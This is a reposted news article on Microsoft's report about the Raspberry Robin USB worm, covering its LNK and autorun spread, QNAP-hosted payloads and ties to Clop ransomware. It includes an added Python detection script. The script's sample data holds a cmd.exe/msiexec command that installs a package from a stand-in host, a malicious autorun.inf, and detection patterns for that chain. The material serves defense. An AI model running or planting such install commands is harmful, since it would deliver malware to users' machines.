Microsoft: Raspberry Robin USB worm hits nearly 1,000 organizations in the past month- Dejkala

by hasibul
October 28, 2022


Image: USB malware (M-A-U / Getty Images)

Microsoft is warning that the relatively new Raspberry Robin USB drive worm has triggered payload alerts on nearly 3,000 devices in almost 1,000 organizations in the past 30 days. 

Raspberry Robin malware has previously been seen installed with FakeUpdates malware, which has been linked to the Russian cyber-crime group EvilCorp. Raspberry Robin has also been used to deploy Lockbit ransomware, as well as IcedID, Bumblebee, and Truebot malware. Now, Microsoft has seen it being used to deploy Clop ransomware.

Microsoft attributes the Clop deployments connected with Raspberry Robin to a group it tracks as DEV-0950. Its activities overlap with the advanced hacking group tracked by FireEye as FIN11. The group last year published its victims’ data on the Clop ransomware leak site.

“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages,” notes the Microsoft Security Threat Intelligence Center (MSTIC).


Security firm Red Canary discovered the Raspberry Robin worm in September 2021 and said it was often installed on Windows systems via a USB drive, which contains a LNK shortcut file disguised as a folder. The malware relies on victims inserting a USB drive to run. While autorun of removable media is disabled by default on Windows, Microsoft notes that many organizations enable it through legacy Group Policy changes. 

MSTIC has found that Raspberry Robin relies on both autorun and tricking users into clicking the LNK file.

“Some Raspberry Robin drives only have the LNK and executable files, while drives from earlier infections have a configured autorun.inf,” MSTIC notes.  

This change could explain why the names of the shortcut files changed from generic names like recovery.lnk to the brand names of USB drives. Microsoft suspects this is to encourage a user to execute the LNK file. The malware also uses compromised QNAP storage appliances to host and deliver its malicious payload.

“Raspberry Robin’s LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices,” MSTIC explains. 
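The two delivery mechanisms described above (an autorun.inf on the drive, and a LNK file that has cmd.exe launch msiexec.exe against a package on a remote NAS) both leave artifacts a defender can check for. The following script is an added example written for this page, not code from Microsoft, Red Canary or the malware itself. It runs two checks over constructed sample data: a process-creation rule that flags msiexec.exe spawned by cmd.exe with an http(s) package source, and an autorun.inf parser that flags `open`/`shellexecute` entries pointing at an executable or .lnk. The event layout, file names and the `nas.example.invalid` host are assumptions for the sample.

```python
"""Detection helpers for the Raspberry Robin delivery chain described above.

Added example (not from the original page or the vendors it quotes). It checks:
  1. process-creation events for cmd.exe -> msiexec.exe installing from a URL,
     the chain a malicious LNK would produce when clicked from Explorer;
  2. autorun.inf content for entries that launch an executable or .lnk file.
All sample data below is constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    image: str          # full path of the created process (e.g. Sysmon Image)
    parent_image: str   # full path of the parent process (ParentImage)
    command_line: str   # command line of the created process


# msiexec installs a package with /i or -i; flag when the source is an http(s) URL
REMOTE_MSI_RE = re.compile(r'(?:^|\s)[/-]i\s+"?https?://', re.IGNORECASE)


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_msiexec_from_cmd(ev: ProcessEvent) -> bool:
    """True when cmd.exe spawns msiexec.exe that installs a package from a URL."""
    return (_basename(ev.image) == "msiexec.exe"
            and _basename(ev.parent_image) == "cmd.exe"
            and REMOTE_MSI_RE.search(ev.command_line) is not None)


def flag_events(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Return only the events matching the cmd.exe -> remote msiexec rule."""
    return [ev for ev in events if is_remote_msiexec_from_cmd(ev)]


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Return key/value pairs of the [autorun] section, keys lower-cased."""
    section = None
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):       # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


# autorun keys that cause something to run, and extensions that run code
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
RISKY_EXT = (".exe", ".lnk", ".cmd", ".bat", ".scr", ".com")


def autorun_launches_program(text: str) -> bool:
    """True when the [autorun] section launches an executable or shortcut."""
    entries = parse_autorun_inf(text)
    for key in LAUNCH_KEYS:
        target = entries.get(key, "").strip('"').lower()
        first = target.split()[0] if target else ""  # program before any args
        if first.endswith(RISKY_EXT):
            return True
    return False


# --- constructed sample data (hypothetical host name and paths) ---
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 r"cmd.exe /c msiexec /q /i http://nas.example.invalid/pkg.msi"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\cmd.exe",
                 r"msiexec /q /i http://nas.example.invalid/pkg.msi"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe",
                 r"msiexec.exe /i C:\Users\alice\Downloads\vendor-tool.msi"),
]

SAMPLE_AUTORUN_MALICIOUS = """[autorun]
; constructed sample: shortcut name taken from the page's description
open=recovery.lnk
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

SAMPLE_AUTORUN_BENIGN = """[autorun]
label=Holiday photos
icon=photos.ico
"""

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_EVENTS):
        print("suspicious:", ev.parent_image, "->", ev.image, "|", ev.command_line)
    print("malicious autorun.inf:", autorun_launches_program(SAMPLE_AUTORUN_MALICIOUS))
    print("benign autorun.inf:", autorun_launches_program(SAMPLE_AUTORUN_BENIGN))
```

The process rule deliberately keys on the parent/child pair plus a remote package source rather than on msiexec.exe alone, since msiexec launched by services.exe with a local .msi is routine software installation. The autorun check is only meaningful where autorun for removable media has been re-enabled, which is the legacy Group Policy condition the article calls out.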

As of July, FakeUpdates, a JavaScript backdoor, was also being delivered through Raspberry Robin, in addition to the malicious ads that had previously been used to deliver it.


Microsoft has found some connections between Raspberry Robin and another piece of malware called Fauppod, which also communicates with compromised QNAP appliances. Fauppod is a heavily obfuscated piece of malware written in .NET. Microsoft believes Fauppod is part of the initial method by which Raspberry Robin infects machines.

“Based on our investigation, Microsoft currently assesses with medium confidence that the above .NET DLLs delivered both by Raspberry Robin LNK infections and Fauppod CPL samples are responsible for spreading Raspberry Robin LNK files to USB drives. These LNK files, in turn, infect other hosts via the infection chain detailed in Red Canary’s blog.”

“Microsoft also assesses with medium confidence that the Fauppod-packed CPL samples are currently the earliest known point in the attack chain for propagating Raspberry Robin infections to targets. Microsoft findings suggest that the Fauppod CPL entities, the obfuscated .NET LNK spreader modules they drop, the Raspberry Robin LNK files Red Canary documented, and the Raspberry Robin DLL files (or, Roshtyak, as per Avast) could all be considered as various components to the “Raspberry Robin” malware infection chain.”

Microsoft also backed up IBM’s previous assertion that Fauppod was linked to the notorious Dridex banking trojan.
